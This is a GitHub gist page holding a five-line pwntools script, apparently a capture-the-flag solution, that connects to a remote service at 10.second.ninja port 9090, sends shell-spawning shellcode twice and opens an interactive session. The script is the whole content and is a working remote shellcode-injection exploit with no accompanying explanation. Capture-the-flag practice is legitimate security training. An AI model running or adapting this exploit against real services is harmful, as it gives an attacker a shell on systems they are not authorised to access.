Skip to content

Instantly share code, notes, and snippets.

@hanhanW
Created January 11, 2016 11:37
Show Gist options
  • Save hanhanW/fd072047b58edeeaf099 to your computer and use it in GitHub Desktop.
Save hanhanW/fd072047b58edeeaf099 to your computer and use it in GitHub Desktop.
from pwn import *
r = remote('10.second.ninja', 9090)
shcode = asm(shellcraft.sh())
r.send(shcode+shcode)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment